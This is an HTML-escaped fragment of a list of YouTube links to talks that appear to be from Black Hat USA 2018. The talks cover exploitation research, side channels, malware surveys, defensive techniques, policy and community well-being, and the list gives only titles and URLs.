&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=OrEar0TiS90&amp;amp;index=15&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;It’s a PHP Unserialization Vulnerability Jim, but Not as We Know It&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=w8brF6aAKGY&amp;amp;index=16&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Day Zero: A Road Map to #BHUSA 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=vEfqb5Ee9_Q&amp;amp;index=17&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Lessons and Lulz: The 4th Annual Black Hat USA NOC Report&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=s2fLRggsG8c&amp;amp;index=18&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Return of Bleichenbacher’s Oracle Threat (ROBOT)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=cCxzyyFewaI&amp;amp;index=19&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;An Attacker Looks at Docker: Approaching Multi-Container Applications&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=4r0WNstqBjI&amp;amp;index=20&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Follow the White Rabbit: Simplifying Fuzz Testing Using FuzzExMachina&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=viy2jUTI244&amp;amp;index=21&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;The Finest Penetration Testing Framework for Software-Defined Networks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=l9XskAF-1Lc&amp;amp;index=22&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Understanding and Exploiting Implanted Medical Devices&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=3K80dWbQsqE&amp;amp;index=23&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Mainframe [z/OS] Reverse Engineering and Exploit Development&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=uS1FkrcJdXU&amp;amp;index=24&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Lowering the Bar: Deep Learning for Side Channel Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=025r8_TrV8I&amp;amp;index=25&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Hardening Hyper-V through Offensive Security Research&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=BtnJhY_nHp0&amp;amp;index=26&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;SirenJack: Cracking a ‘Secure’ Emergency Warning Siren System&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=Bl_oTIuz_VA&amp;amp;index=27&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Practical Web Cache Poisoning: Redefining ‘Unexploitable’&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=j_DRFWg1arw&amp;amp;index=28&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;IoT Malware: Comprehensive Survey, Analysis Framework and Case Studies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=GQlxpAcIM8o&amp;amp;index=29&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;SDL the Wont Break the Bank&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=yuZp3NY2XLk&amp;amp;index=30&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;For the Love of Money: Finding and Exploiting Vulnerabilities in Mobile Point of Sales Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=8M8MurmuEtQ&amp;amp;index=31&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Last Call for SATCOM Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=jhusVU5ykkI&amp;amp;index=32&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Exploitation of a Modern Smartphone Baseband&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=MTfE2OgUlKc&amp;amp;index=33&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Automated Discovery of Deserialization Gadget Chains&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=I22gkgG3yUU&amp;amp;index=34&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Legal Liability for IOT Cybersecurity Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=Go0LNNAaFkU&amp;amp;index=35&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Another Flip in the Row&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=PwQ16v0jy7o&amp;amp;index=36&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;How can Someone with Autism Specifically Enhance the Cyber Security Workforce?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=i0f9T3aEvM0&amp;amp;index=37&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Catch me, Yes we can! - Pwning Social Engineers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=B7Uvjx3Ud-w&amp;amp;index=38&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Automating Exploit Generation for Arbitrary Types of Kernel Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=wDNQ-8aWLO0&amp;amp;index=39&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Windows Offender: Reverse Engineering Windows Defender’s Antivirus Emulator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=CAwua_lugV8&amp;amp;index=40&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Protecting the Protector, Hardening Machine Learning Defenses Against Adversarial Attacks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=cr7UgfWXLTQ&amp;amp;index=41&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Playback: A TLS 1.3 Story&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=_J9MpK4MQWk&amp;amp;index=42&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;An Inside Story of Mitigating Speculative Execution Side Channel Vulnerabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=ZBq7VMIkgPk&amp;amp;index=43&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;TLBleed: When Protecting Your CPU Caches is Not Enough&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=80ou9RrJQD0&amp;amp;index=44&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;None of My Pixel is Your Business: Active Watermarking Cancellation Against Video Streaming Service&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=EcLSz2x4Q4c&amp;amp;index=45&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;So I became a Domain Controller&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=DFPD9yI-C70&amp;amp;index=46&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;WebAssembly: A New World of Native Exploits on the Browser&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=Opjb5hPlxtY&amp;amp;index=47&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Outsmarting the Smart City&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=w2H3BioA-iQ&amp;amp;index=48&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=WG1k-Xh1TqM&amp;amp;index=49&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;AI &amp;amp; ML in Cyber Security - Why Algorithms are Dangerous&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=J0igIVmcY5g&amp;amp;index=50&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Stealth Mango and the Prevalence of Mobile Surveillanceware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=jRb54Xb7TCI&amp;amp;index=51&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=ku8jZe-MHUU&amp;amp;index=52&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;A Deep Dive into macOS MDM (and How it can be Compromised)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=66x3vfac8rA&amp;amp;index=53&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Pestilential Protocol: How Unsecure HL7 Messages Threaten Patient Lives&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=WaoYqBC5hoY&amp;amp;index=54&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;GOD MODE UNLOCKED - Hardware Backdoors in x86 CPUs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=T-YkhNElvng&amp;amp;index=55&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Decompiler Internals: Microcode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=MEnsL_qsbfE&amp;amp;index=56&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform Capabilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=MybmgE95weo&amp;amp;index=57&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=BBJgKuXzfwc&amp;amp;index=58&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Kernel Mode Threats and Practical Defenses&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=1D6ijAUwK-4&amp;amp;index=59&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;New Norms and Policies in Cyber-Diplomacy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=CjxY0uu-rEg&amp;amp;index=60&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Snooping on Cellular Gateways and Their Critical Role in ICS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=eQCsLCOBmuk&amp;amp;index=61&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Your Voice is My Passport&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=QyqR4mMdClc&amp;amp;index=62&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Reconstruct the World from Vanished Shadow: Recovering Deleted VSS Snapshots&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=Zjrty05REoc&amp;amp;index=63&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Identity Theft: Attacks on SSO Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=jI8lmlPfp1I&amp;amp;index=64&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;The Science of Hiring and Retaining Female Cybersecurity Engineers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=MApUGOFFWQc&amp;amp;index=65&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Black Box is Dead. Long Live Black Box!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=UANF2FQctDg&amp;amp;index=66&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Fire &amp;amp; Ice: Making and Breaking macOS Firewalls&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=jBE52RFld1Y&amp;amp;index=67&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Demystifying PTSD in the Cybersecurity Environment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=BHwqORo_83E&amp;amp;index=68&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;The Problems and Promise of WebAssembly&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=-6ZlwPDpbQw&amp;amp;index=69&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Real Eyes, Realize, Real Lies: Beating Deception Technologies&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=0dWj9E6V49w&amp;amp;index=70&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;ARTist - An Instrumentation Framework for Reversing and Analyzing Android Apps and the Middleware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=Bb-IkGiwFtk&amp;amp;index=71&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Money-rity Report: Using Intelligence to Predict the Next Payment Card Fraud Victims&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=omDmeU9eUKI&amp;amp;index=72&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Lessons from Virginia - A Comparative Forensic Analysis of WinVote Voting Machines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=-_yyx9OOeHE&amp;amp;index=73&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Stop that Release, There’s a Vulnerability!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=EI0wgJEYQ0s&amp;amp;index=74&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Pwnie Awards&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=crDJh8k36_w&amp;amp;index=75&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Beating the Blockchain by Mapping Out Decentralized Namecoin and Emercoin Infrastructure&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=_-hikKLw--s&amp;amp;index=76&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Applied Self-Driving Car Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=kNBOEZg7cSQ&amp;amp;index=77&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Is the Mafia Taking Over Cybercrime?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=pfLpPHN0SjM&amp;amp;index=78&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;AFL’s Blindspot and How to Resist AFL Fuzzing for Arbitrary ELF Binaries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=QrI2QLLrzzg&amp;amp;index=79&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Back to the Future: A Radical Insecure Design of KVM on ARM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=kXgjf70kvcw&amp;amp;index=80&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;I, for One, Welcome Our New Power Analysis Overlords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=V13K5Uz3x0g&amp;amp;index=81&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;How can Communities Move Forward After Incidents of Sexual Harassment or Assault?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=YKRtFgunyj4&amp;amp;index=82&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;The Air-Gap Jumpers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=niBxCgAGSiA&amp;amp;index=83&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Attacks on the Curl-P Hash Function Leading to Signature Forgeries in the IOTA Signature Scheme&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=sBjc8WYce7Y&amp;amp;index=84&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;InfoSec Philosophies for the Corrupt Economy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=zV7d5RQ4RQY&amp;amp;index=85&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;ZEROing Trust: Do Zero Trust Approaches Deliver Real Security?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=fFXTUV3BE1c&amp;amp;index=86&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Breaking the IIoT: Hacking industrial Control Gateways&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=3yLZMHYBsTc&amp;amp;index=87&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Holding on for Tonight: Addiction in InfoSec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=T3G7IO5g1-8&amp;amp;index=88&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Dissecting Non-Malicious Artifacts: One IP at a Time&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=Qr6s8XFan6U&amp;amp;index=89&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;How I Learned to Stop Worrying and Love the SBOM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=mPWO1xiO_Rg&amp;amp;index=90&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Why so Spurious? Achieving Local Privilege Escalation on Operating Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=CIhHpkybYsY&amp;amp;index=91&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Breaking Parser Logic: Take Your Path Normalization off and Pop 0days Out!&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=iY6CQBgs1w0&amp;amp;index=92&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;A Brief History of Mitigation: The Path to EL1 in iOS 11&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=zPj5tTFDql0&amp;amp;index=93&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Squeezing a Key through a Carry Bit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=DNM_yev6qFI&amp;amp;index=94&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Behind the Speculative Curtain: The True Story of Fighting Meltdown and Spectre&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=0xh7ADgTckA&amp;amp;index=95&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;LTE Network Automation Under Threat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=8vasN06gVUo&amp;amp;index=96&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Every ROSE has its Thorn: The Dark Art of Remote Online Social Engineering&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=NMClsPZtIGY&amp;amp;index=97&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;From Workstation to Domain Admin: Why Secure Administration isn’t Secure and How to Fix it&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=bQsRg0VsYoo&amp;amp;index=98&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Don’t @ Me: Hunting Twitter Bots at Scale&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=R5IEyoFpZq0&amp;amp;index=99&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;Subverting Sysmon: Application of a Formalized Security Product Evasion Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=88GyLoZbDNw&amp;amp;index=100&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;WireGuard: Next Generation Secure Network Tunnel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=mosERjbrgdo&amp;amp;index=101&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe"&gt;The Unbearable Lightness of BMC’s&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=UTSJf05pw-0&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=102"&gt;Meltdown: Basics, Details, Consequences&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=qwkgxNTnZIk&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=103"&gt;Mental Health Hacks: Fighting Burnout, Depression and Suicide in the Hacker Community&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=DMFF8zQqEVQ&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=104"&gt;Threat Modeling in 2018: Attacks, Impacts and Other Updates&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=e_iTZpVIh5c&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=105"&gt;Deep Dive into an ICS Firewall, Looking for the Fire Hole&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=K7wqwOzD1Yw&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=106"&gt;Screaming Channels: When Electromagnetic Side Channels Meet Radio Transceivers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=98bSZXhlhSA&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=107"&gt;No Royal Road … Notes on Dangerous Game&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=tA7GW9XkXBU&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=108"&gt;Reversing a Japanese Wireless SD Card - From Zero to Code Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=YICkPb27_Cw&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=109"&gt;Compression Oracle Attacks on VPN Networks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=u1ErD7l0xXQ&amp;amp;t=0s&amp;amp;list=PLH15HpR5qRsVAXGmSVfjWrGtGLJjIJuGe&amp;amp;index=110"&gt;Remotely Attacking System Firmware&lt;/a&gt;&lt;/li&gt;
